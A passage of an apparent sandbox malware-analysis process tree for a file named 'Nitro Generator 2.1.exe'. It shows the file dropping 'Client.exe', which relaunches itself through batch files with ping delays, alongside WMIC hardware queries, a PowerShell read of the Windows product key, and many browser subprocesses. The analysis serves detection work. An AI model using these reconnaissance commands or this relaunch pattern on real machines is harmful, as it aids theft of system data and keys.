      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5400
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3840

C:\Users\Admin\Downloads\Nitro Generator 2.1.exe
"C:\Users\Admin\Downloads\Nitro Generator 2.1.exe"
1⤵
- Executes dropped EXE
- NTFS ADS
PID:568
- C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
  "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ys5CAZQc50zy.bat" "
    3⤵
    PID:5636
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:5024
  - - C:\Windows\system32\PING.EXE
      ping -n 10 localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:836
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:4680
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NiNtu1mthsg9.bat" "
        5⤵
        
        PID:6024
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1988
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5960
      - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vJBkOxFWzCRh.bat" "
        7⤵
        
        PID:5484
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5632
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5956
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eqa7yhKMx08c.bat" "
        9⤵
        
        PID:5036
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:5324
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1972
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7kG7WuVHbPyP.bat" "
        11⤵
        
        PID:3760
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:4488
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5320
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bGqBVyhlR90U.bat" "
        13⤵
        
        PID:1704
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:4380
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5208
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qtwNaZfOgXS4.bat" "
        15⤵
        
        PID:4772
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:3528
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2060
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XFpl0TQVqi6p.bat" "
        17⤵
        
        PID:2652
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:5764
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5608
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d7bw3GzKaBM2.bat" "
        19⤵
        
        PID:4388
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:2248
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5244
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KFMrKW99E1ij.bat" "
        21⤵
        
        PID:3748
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:4392
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5936
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ksBMyWxUWgI6.bat" "
        23⤵
        
        PID:3420
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:3632
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3496
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cIZ6ZlC22bJ8.bat" "
        25⤵
        
        PID:5768
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:5896
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6132
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cIG6nfJoydAf.bat" "
        27⤵
        
        PID:6060
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:5648
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4560
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XEQOh1rG5E4x.bat" "
        29⤵
        
        PID:2984
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:4068
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4020
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8FJdzrcjImLH.bat" "
        31⤵
        
        PID:3576
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:2736
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe2a2546f8,0x7ffe2a254708,0x7ffe2a254718
  2⤵
  PID:2944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:4508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
  2⤵
  PID:2136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
  2⤵
  PID:4948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
  2⤵
  PID:2164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
  2⤵
  PID:2608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
  2⤵
  PID:436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
  2⤵
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
  2⤵
  PID:5280
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6108 /prefetch:8
  2⤵
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6108 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
  2⤵
  PID:2508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:5848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6180 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
  2⤵
  PID:2328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
  2⤵
  PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
  2⤵
  PID:2376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:5264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2040 /prefetch:1
  2⤵
  PID:208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
  2⤵
  PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:4340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1
  2⤵
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:5968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
  2⤵
  PID:5268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:2460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
  2⤵
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
  2⤵
  PID:1144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:5384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7352 /prefetch:1
  2⤵
  PID:916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:1
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
  2⤵
  PID:5664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
